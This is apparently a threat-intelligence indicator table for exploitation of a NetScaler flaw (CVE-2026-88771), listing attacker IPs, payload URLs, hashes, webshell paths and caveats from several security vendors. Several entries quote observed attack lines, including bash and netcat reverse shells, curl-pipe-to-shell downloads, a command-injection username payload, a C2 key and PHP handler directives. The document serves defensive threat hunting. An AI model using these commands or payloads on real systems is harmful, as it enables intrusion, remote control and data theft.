IPv4125.122.56.47GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (CHINANET BACKBONE, China)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it.GreyNoise Visualizer tag search, viewed Sep 29
IPv423.132.164.35GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Netiface America, Inc., Switzerland)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv492.118.204.229GreyNoise tag [56]; LevelBlue SpiderLabs (THOR team) [42]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Catixs Ltd, United States). LevelBlue: source of command-execution testing (e.g. whoami)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. LevelBlue also lists it from its own THOR hunt, not independently confirmed.GreyNoise Visualizer tag search, viewed Sep 29
IPv454.70.59.128GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Amazon.com, Inc., United States)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv444.226.128.41GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Amazon.com, Inc., United States)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv44.246.63.96GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Microsoft Corporation, United States)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv4176.65.148.54GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Pfcloud UG, Netherlands)Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting.GreyNoise Visualizer tag search, viewed Sep 29
IPv4104.28.193.147GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 29 (Cloudflare, Inc., Japan)Cloudflare WARP egress address, shared by very many ordinary Cloudflare WARP / 1.1.1.1 users. Never block it and never import it into an IoC feed; use it only to correlate timing within your own logs.GreyNoise Visualizer tag search, viewed Sep 29
IPv4104.28.211.105GreyNoise tag [56]Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 29 (Cloudflare, Inc., Japan)Cloudflare WARP egress address, shared by very many ordinary Cloudflare WARP / 1.1.1.1 users. Never block it and never import it into an IoC feed; use it only to correlate timing within your own logs.GreyNoise Visualizer tag search, viewed Sep 29
User-AgentPython-urllibLupovis (@LupovisDefence) on X, Sep 28 [62]Client used for CVE-2026-88771 log-poison exploitation on Lupovis decoys (payload runs id;uname, DNS callback to httpworkbench)Lupovis honeypot observation (its own post on X, plus press and Beazley). Mostly opportunistic activity after the public PoC. Python-urllib is a common library default; only meaningful together with the auth-endpoint payload.Public post, no TLP marking
URI path/vpn/scripts/linux/nsgclient18.debMaurice_Sec on X [107]; CyberMaxx [52]; Google GTIG / Mandiant [34]; Unit 42 (Palo Alto Networks) [96]GET requests referenced in a NetScaler Console IoC scanner finding (Maurice_Sec field notes)Single practitioner report; the author is "not 100%" on this finding. Matches the GTIG nsgclient*.deb staging pattern. A legitimate client package normally lives at similar paths, so check file content, not just the name.Public post, no TLP marking
URI path/vpn/scripts/linux/nsgclient18_32.debMaurice_Sec on X [107]; CyberMaxx [52]; Google GTIG / Mandiant [34]GET requests referenced in a NetScaler Console IoC scanner finding (Maurice_Sec field notes)Single practitioner report; the author is "not 100%" on this finding. Matches the GTIG nsgclient*.deb staging pattern. Check file content, not just the name.Public post, no TLP marking
Domainechvista.comIFIN [57]Associated exploit source (IFIN compiled observables)Compiled by IFIN from shared reports; the original reporter of each value is not stated. No A record when checked on Sep 29.Public, no restriction
SHA-25673b74309f4728d169cc9edfb2767c5aadd75d39b62de93c935a86c777d2646bcArctic Wolf [36]First payload returned from /xd7h/xArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
SHA-2569c7bf01d2c2cb31a3609d27c1bc9abc60d86e37b7f9908547e0c75fb18b99aabArctic Wolf [36]nsmon.pl Perl implant returned from /xd7h/nsmon.plArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
SHA-25657f9f30c50240fd48d761de7961a430cdebf2c084a36bc76d376a1ce8e6dfa9dArctic Wolf [36]Initial payload in a separate observation involving 62.133.62.80Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
SHA-256974b69782fdf5d67b97cfd508465939e44ee10798dbcc1e82b92d78776bad938Arctic Wolf [36]; LevelBlue SpiderLabs (THOR team) [42]Perl script update_c08937.plArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. LevelBlue also lists it from its own THOR hunt, not independently confirmed.Public GitHub repository, no TLP marking
SHA-256927c7fbef2e620c1ce482c3ed67ebf53da97693c1d6c7552c77aec84ba982cf8Arctic Wolf [36]Platypus agent (shell script) retrieved from entretiensol.comArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
IPv445.141.21.130Arctic Wolf [36]; LevelBlue SpiderLabs (THOR team) [42]Reverse-shell destination: /bin/sh -i to port 443Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. LevelBlue also lists it from its own THOR hunt, not independently confirmed.Public GitHub repository, no TLP marking
IPv468.178.160.183Arctic Wolf [36]Payload host on ports 8888 and 8899 (/test, /test111)Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
IPv489.44.80.7Arctic Wolf [36]Callback host: /exec-ok and Base64 id output on port 65456; nc -e /bin/sh to port 58963Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
IPv4130.94.42.226Arctic Wolf [36]Callback on port 18805Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
IPv4134.175.71.50Arctic Wolf [36]Payload host on port 4123Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
IPv4177.4.12.11Arctic Wolf [36]Served /s?t=a, b and c on port 8080, piped to shArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
URLhttp://64.94.85.67:443/update_c08937.plArctic Wolf [36]; LevelBlue SpiderLabs (THOR team) [42]Fetched with curl and piped to perl inside the injected usernameArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. LevelBlue also lists it from its own THOR hunt, not independently confirmed.Public GitHub repository, no TLP marking
URLhttp://62.133.62.80:80/xd7h/xArctic Wolf [36]; LevelBlue SpiderLabs (THOR team) [42]First payload fetched by the applianceArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. LevelBlue also lists it from its own THOR hunt, not independently confirmed.Public GitHub repository, no TLP marking
URLhttp://62.133.62.80:80/xd7h/nsmon.plArctic Wolf [36]nsmon.pl implant downloadArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
URLhttp://23.27.143.20:9000/main.pyArctic Wolf [36]; LevelBlue SpiderLabs (THOR team) [42]Python payload downloadArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. LevelBlue also lists it from its own THOR hunt, not independently confirmed.Public GitHub repository, no TLP marking
URLhttp://153.75.82.220/download/x.shArctic Wolf [36]Shell payload, piped to bashArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
Domainentretiensol.comArctic Wolf [36]Served a Platypus agent over HTTPS (/api/v1/install/...)Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
File path/var/tmp/.nsmon/nsmon.plArctic Wolf [36]nsmon.pl copies itself here with 0755 permissionsArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
File path/var/1.pyArctic Wolf [36]main.py saved here before executionArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
File path/var/tmp/.sArctic Wolf [36]File path listed by Arctic WolfArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
Cron entry*/5 * * * * root perl /var/tmp/.nsmon/nsmon.plArctic Wolf [36]Cron entry nsmon.pl attempts to add to /etc/crontab or /nsconfig/crontab (attempted persistence)Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
NetworkTCP listener on 41000-41999Arctic Wolf [36]nsmon.pl attempts to listen on 0.0.0.0 on a configured port or a free port in this rangeArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
IPv478.47.24.217Unit 42 (Palo Alto Networks) [96]Fingerprinting 21-22 Aug; part of the 21 Sep three-stage webshell dropUnit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw.Public blog, no TLP marking
IPv466.135.19.18Unit 42 (Palo Alto Networks) [96]One of four VPSs (one per day, 4-8 Sep) requesting nsgclient18.deb and nsgser18.debUnit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw.Public blog, no TLP marking
IPv4167.99.111.203Unit 42 (Palo Alto Networks) [96]One of four VPSs (one per day, 4-8 Sep) requesting nsgclient18.deb and nsgser18.debUnit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw.Public blog, no TLP marking
IPv4142.93.85.227Unit 42 (Palo Alto Networks) [96]One of four VPSs (one per day, 4-8 Sep) requesting nsgclient18.deb and nsgser18.debUnit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw.Public blog, no TLP marking
IPv4104.248.74.206Unit 42 (Palo Alto Networks) [96]One of four VPSs (one per day, 4-8 Sep) requesting nsgclient18.deb and nsgser18.debUnit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw.Public blog, no TLP marking
IPv4137.184.91.207Unit 42 (Palo Alto Networks) [96]Requested the same .deb files on 7 SepUnit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw.Public blog, no TLP marking
IPv4162.33.178.9Unit 42 (Palo Alto Networks) [96]Requested nsgbuild.deb and nsgsupport.deb on 14 SepUnit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw.Public blog, no TLP marking
IPv4193.149.176.207Unit 42 (Palo Alto Networks) [96]Requested nsgbuild.deb daily 15-24 Sep (most of the requests Unit 42 saw) and GetUserNameUnit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw.Public blog, no TLP marking
IPv445.61.136.143Unit 42 (Palo Alto Networks) [96]Listed in the Unit 42 network indicatorsUnit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw.Public blog, no TLP marking
IPv466.227.183.84Unit 42 (Palo Alto Networks) [96]Listed in the Unit 42 network indicatorsUnit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw.Public blog, no TLP marking
IPv4216.245.184.164Unit 42 (Palo Alto Networks) [96]Listed in the Unit 42 network indicatorsUnit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw.Public blog, no TLP marking
IPv4104.28.215.137Unit 42 (Palo Alto Networks) [96]Requested .deb webshell files 9-11 Sep; GetUserName stream (Cloudflare WARP)Cloudflare WARP egress address, shared by very many ordinary Cloudflare WARP / 1.1.1.1 users. Never block it and never import it into an IoC feed; use it only to correlate timing within your own logs.Public blog, no TLP marking
IPv4104.28.247.136Unit 42 (Palo Alto Networks) [96]Requested .deb webshell files 9-11 Sep; GetUserName stream (Cloudflare WARP)Cloudflare WARP egress address, shared by very many ordinary Cloudflare WARP / 1.1.1.1 users. Never block it and never import it into an IoC feed; use it only to correlate timing within your own logs.Public blog, no TLP marking
IPv4104.28.215.136Unit 42 (Palo Alto Networks) [96]Requested .deb webshell files 9-11 Sep; GetUserName stream (Cloudflare WARP)Cloudflare WARP egress address, shared by very many ordinary Cloudflare WARP / 1.1.1.1 users. Never block it and never import it into an IoC feed; use it only to correlate timing within your own logs.Public blog, no TLP marking
IPv4104.28.247.137Unit 42 (Palo Alto Networks) [96]GetUserName request stream 10-27 Sep (Cloudflare WARP)Cloudflare WARP egress address, shared by very many ordinary Cloudflare WARP / 1.1.1.1 users. Never block it and never import it into an IoC feed; use it only to correlate timing within your own logs.Public blog, no TLP marking
SHA-256ae22ef2517b5c0fb47f78745b9cb5260acee0e751b89bcd354640ff8bc8d29ecUnit 42 (Palo Alto Networks) [96]nsg64.deb PHP webshell: RC4-encrypted C2 with exec, upload and file exfiltration; privilege escalation through the legitimate SUID binary /var/netscaler/.ns_suidcmdUnit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw.Public blog, no TLP marking
SHA-2561bd314b661396c7086f6367fbbb48025e03ca2de69c073d53a8b0a38aa5fbb7dUnit 42 (Palo Alto Networks) [96]Text of Unit 42 Figure 1 (Base64 payload)Unit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw. Hash of a text file reproducing the figure, so it will not match on-disk artefacts.Public blog, no TLP marking
SHA-25679c65fa04541032e251fa4796b97800374b63c7982593dd1a2e0db605d429186Unit 42 (Palo Alto Networks) [96]Text of Unit 42 Figure 2 (decoded shell script)Unit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw. Hash of a text file reproducing the figure, so it will not match on-disk artefacts.Public blog, no TLP marking
URI path/vpn/scripts/linux/nsg64.debUnit 42 (Palo Alto Networks) [96].deb webshell name requested 4-24 SepUnit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw.Public blog, no TLP marking
URI path/vpn/scripts/linux/nsgser18.debUnit 42 (Palo Alto Networks) [96].deb webshell name requested 4-24 SepUnit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw.Public blog, no TLP marking
URI path/vpn/scripts/linux/nsgsupport.debUnit 42 (Palo Alto Networks) [96].deb webshell name requested 4-24 SepUnit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw.Public blog, no TLP marking
URI path/vpn/scripts/linux/nsgpackage64.debUnit 42 (Palo Alto Networks) [96].deb webshell name requested 4-24 SepUnit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw.Public blog, no TLP marking
URI path/vpn/scripts/linux/nsgbuild.debUnit 42 (Palo Alto Networks) [96].deb webshell name requested 4-24 SepUnit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw.Public blog, no TLP marking
URI path/logon/LogonPoint/Authentication/GetUserNameUnit 42 (Palo Alto Networks) [96]Continuous request stream 10-27 Sep; Unit 42 believes any activity to this path is anomalousUnit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw.Public blog, no TLP marking
URI path/admin_ui/common/css/ns/ui.cssUnit 42 (Palo Alto Networks) [96]Requested 21-22 Aug for version fingerprintingLegitimate NetScaler file used for fingerprinting, not an IoC on its own. Hunt for requests from the listed IPs or unusual sources.Public blog, no TLP marking
URI path/vpn/js/rdx/core/lang/rdx_en.json.gzUnit 42 (Palo Alto Networks) [96]Requested 21-22 Aug for version fingerprintingLegitimate NetScaler file used for fingerprinting, not an IoC on its own. Hunt for requests from the listed IPs or unusual sources.Public blog, no TLP marking
Cookie valuee826d7ddf3c85920Unit 42 (Palo Alto Networks) [96]CsrfToken value that unlocks the .ctxs.receiver webshell; the NSC_TASS cookie carries the commandUnit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw. Unit 42 calls it a per-implant password; other intrusions may use other tokens.Public blog, no TLP marking
RC4 key7489a0f93c67fa5cdaeb4b921d90594dUnit 42 (Palo Alto Networks) [96]nsg64.deb C2 key: MD5 of the hard-coded passphrase Rhfajaf1H992; operators authenticate with the k parameterUnit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw.Public blog, no TLP marking
Commandchmod 6555 /bin/shUnit 42 (Palo Alto Networks) [96]First step of the decoded .ctxs.receiver installer: sets SUID and SGID on /bin/shUnit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw.Public blog, no TLP marking
IPv445.76.34.141Sygnia [37]Sygnia confidence High: observed in malicious AAA eventsSygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking.Public advisory, no TLP marking
IPv4170.64.176.26Sygnia [37]Sygnia confidence High: associated with activity in an active IR investigationSygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking.Public advisory, no TLP marking
IPv4209.250.236.77Sygnia [37]Sygnia confidence Medium: time-correlated with exploit-style activitySygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking.Public advisory, no TLP marking
IPv4138.68.21.29Sygnia [37]Sygnia confidence Medium: strong temporal and service-path correlationSygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking.Public advisory, no TLP marking
File path/var/netscaler/gui/vpn/scripts/linux/1bd8a664.sigSygnia [37]Suspicious .sig file in a web-accessible directorySygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking.Public advisory, no TLP marking
File path/netscaler/ns_gui/vpn/c88771.jsonSygnia [37]Suspicious JSON artefact in the VPN web directorySygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking.Public advisory, no TLP marking
File path/var/netscaler/logon/insight-new.jsSygnia [37]; LevelBlue SpiderLabs (THOR team) [42]Target of an attempted copy of /flash/nsconfig/ns.conf (configuration exposure)Sygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking. LevelBlue also lists it from its own THOR hunt, not independently confirmed.Public advisory, no TLP marking
File name80974ca9.sigSygnia [37]Artefact in a NetScaler web-accessible directorySygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking.Public advisory, no TLP marking
File nameLoginIcon.sigSygnia [37]Artefact in a NetScaler web-accessible directorySygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking.Public advisory, no TLP marking
Apache directiveAddHandler application/x-httpd-php .cssSygnia [37]Makes CSS-looking files run as PHPSygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking.Public advisory, no TLP marking
Apache directiveAddHandler application/x-httpd-php .icoSygnia [37]Makes icon-looking files run as PHPSygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking.Public advisory, no TLP marking
NetScaler log lineAAA LOGIN_FAILED: User pitboss PPE unexpectedly died NSPPE;curl http://64.94.85.67:443/update_c08937.pl | perl;# X - Client_ip 64.94.85.67 - Failure_reason "External authentication server denied access"Arctic Wolf [36]Failed login with the injected command as the username. Appliance-side line from production telemetry; the same pattern Lupovis saw in HTTP bodies on its decoys.Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. Shows the command reached the authentication logging path, not that it ran; correlate with process and file evidence.Public GitHub repository, no TLP marking
NetScaler log lineAAA LOGIN REQ: parsed data; username: <pitboss PPE unexpectedly died NSPPE;curl http://64.94.85.67:443/update_c08937.pl | perl;# X>Arctic Wolf [36]AAA parses the injected username. Appliance-side line from production telemetry; the same pattern Lupovis saw in HTTP bodies on its decoys.Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. Shows the command reached the authentication logging path, not that it ran; correlate with process and file evidence.Public GitHub repository, no TLP marking
NetScaler log lineAAAD API: sending login req to aaad for <pitboss PPE unexpectedly died NSPPE;curl http://64.94.85.67:443/update_c08937.pl | perl;# X>, factor <...>, auth type 4129Arctic Wolf [36]SSLVPN message passing the username to aaad. Appliance-side line from production telemetry; the same pattern Lupovis saw in HTTP bodies on its decoys.Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. Shows the command reached the authentication logging path, not that it ran; correlate with process and file evidence.Public GitHub repository, no TLP marking
NetScaler log lineAuthentication delegated to Packet engine for pitboss PPE unexpectedly died NSPPE;curl http://64.94.85.67:443/update_c08937.pl | perl;# X, trying to find appropriate action with bitmask 1Arctic Wolf [36]AAATM message. Appliance-side line from production telemetry; the same pattern Lupovis saw in HTTP bodies on its decoys.Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. Shows the command reached the authentication logging path, not that it ran; correlate with process and file evidence.Public GitHub repository, no TLP marking
URLhttp://31.56.197.72:9090/lulaArctic Wolf [36]; LevelBlue SpiderLabs (THOR team) [42]Payload URLArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. LevelBlue also lists it from its own THOR hunt, not independently confirmed.Public GitHub repository, no TLP marking
URLhttp://31.56.197.72/lulaArctic Wolf [36]Payload URLArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
URLhttp://31.56.197.72/kkArctic Wolf [36]Payload URLArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
URLhttp://68.178.160.183:8899/test111Arctic Wolf [36]Payload URLArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
URLhttp://68.178.160.183:8888/testArctic Wolf [36]Payload URLArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
URLhttp://89.44.80.7:65456/exec-okArctic Wolf [36]Execution-check callbackArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
URLhttp://89.44.80.7:65456/$(id|base64 -w0)Arctic Wolf [36]Callback carrying Base64 id outputArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
URLhttp://130.94.42.226:18805/?t=<REDACTED>Arctic Wolf [36]Callback (token redacted by Arctic Wolf)Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
URLhttp://134.175.71.50:4123/1Arctic Wolf [36]Payload URLArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
URLhttp://177.4.12.11:8080/s?t=aArctic Wolf [36]Fetched with curl -sk and piped to shArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
URLhttp://177.4.12.11:8080/s?t=bArctic Wolf [36]Fetched with curl -sk and piped to shArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
URLhttp://177.4.12.11:8080/s?t=cArctic Wolf [36]Payload URLArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
URLhttps://entretiensol.com:443/api/v1/install/<REDACTED>Arctic Wolf [36]Platypus agent install, fetched with curl -fsSL --tlsv1.2 -k (path redacted by Arctic Wolf)Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
Command/bin/sh -i >& /dev/tcp/45.141.21.130/443 0>&1Arctic Wolf [36]Bash reverse shell, observed in the injected usernameArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
Commandnc -e /bin/sh 89.44.80.7 58963Arctic Wolf [36]Netcat reverse shell, observed in the injected usernameArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
Commandid|base64 -w0Arctic Wolf [36]Command-output exfiltration over HTTP, observed in the injected usernameArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
Commandcurl -fsSL http://153.75.82.220/download/x.sh | bashArctic Wolf [36]Remote shell script execution, observed in the injected usernameArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
Commandcurl -sk 177.4.12.11:8080/s?t=a|shArctic Wolf [36]Remote shell script execution, observed in the injected usernameArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
IPv470.172.58.168LevelBlue SpiderLabs (THOR team) [42]Source of NetScaler exploitation attemptsLevelBlue THOR hunt finding across its own customer environments; not independently confirmed. Use as a hunting pivot, not a blocklist.Public blog, no TLP marking
IPv4162.243.36.88LevelBlue SpiderLabs (THOR team) [42]Source of NetScaler exploitation attemptsLevelBlue THOR hunt finding across its own customer environments; not independently confirmed. Use as a hunting pivot, not a blocklist.Public blog, no TLP marking
IPv4173.40.135.209LevelBlue SpiderLabs (THOR team) [42]Source of NetScaler exploitation attemptsLevelBlue THOR hunt finding across its own customer environments; not independently confirmed. Use as a hunting pivot, not a blocklist.Public blog, no TLP marking
IPv447.230.224.154LevelBlue SpiderLabs (THOR team) [42]Source of NetScaler exploitation attemptsLevelBlue THOR hunt finding across its own customer environments; not independently confirmed. Use as a hunting pivot, not a blocklist.Public blog, no TLP marking
SHA-256e9fe43968c6c0955300e3bc4d7fb0b05a18570b4733aaf4f5c6f7f09be5a242cLevelBlue SpiderLabs (THOR team) [42]main.py: overwrites /var/python/bin/customsnmpd with a Python reverse shell to 45.141.21.130:443 and kills the running customsnmpdLevelBlue THOR hunt finding across its own customer environments; not independently confirmed. Use as a hunting pivot, not a blocklist.Public blog, no TLP marking
URLhttp://64.94.85.67:443/update_result_3567cs.tgzLevelBlue SpiderLabs (THOR team) [42]Upload target for the archived /flash/nsconfig (attempted upload; LevelBlue does not confirm the data left)LevelBlue THOR hunt finding across its own customer environments; not independently confirmed. Use as a hunting pivot, not a blocklist.Public blog, no TLP marking
File path/tmp/update_result_3567cs.tgzLevelBlue SpiderLabs (THOR team) [42]Archive of /flash/nsconfig staged by update_c08937.pl, then deleted with the script itself; absence does not mean it did not runLevelBlue THOR hunt finding across its own customer environments; not independently confirmed. Use as a hunting pivot, not a blocklist.Public blog, no TLP marking
File path/var/netscaler/logon/LogonPoint/.local_journalLevelBlue SpiderLabs (THOR team) [42]PHP webshell (command execution, upload, download) installed by update_c08937.plLevelBlue THOR hunt finding across its own customer environments; not independently confirmed. Use as a hunting pivot, not a blocklist.Public blog, no TLP marking
File path/var/netscaler/logon/LogonPoint/xua.htmlLevelBlue SpiderLabs (THOR team) [42]tar archive of /flash/nsconfig written into the web directory (configuration staging)LevelBlue THOR hunt finding across its own customer environments; not independently confirmed. Use as a hunting pivot, not a blocklist.Public blog, no TLP marking
File path/var/python/bin/customsnmpdLevelBlue SpiderLabs (THOR team) [42]Overwritten by main.py with a reverse shell; unexpected modification or execution is a leadLevelBlue THOR hunt finding across its own customer environments; not independently confirmed. Use as a hunting pivot, not a blocklist.Public blog, no TLP marking
Accountsec_monitorLevelBlue SpiderLabs (THOR team) [42]Local superuser added to /flash/nsconfig/ns.conf by update_c08937.plLevelBlue THOR hunt finding across its own customer environments; not independently confirmed. Use as a hunting pivot, not a blocklist.Public blog, no TLP marking
URL aliasLogonUISimple.html.style.min.cssLevelBlue SpiderLabs (THOR team) [42]CSS-looking alias (and hex variants) mapped in httpd.conf to the .local_journal webshellLevelBlue THOR hunt finding across its own customer environments; not independently confirmed. Use as a hunting pivot, not a blocklist.Public blog, no TLP marking
Log stringpitboss PPE unexpectedly died NSPPE;whoami;# XLevelBlue SpiderLabs (THOR team) [42]Command-execution test in an authentication usernameLevelBlue THOR hunt finding across its own customer environments; not independently confirmed. Use as a hunting pivot, not a blocklist.Public blog, no TLP marking
File path/var/tmp/.nsmon/.cfgArctic Wolf [36]nsmon.pl configuration valuesArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
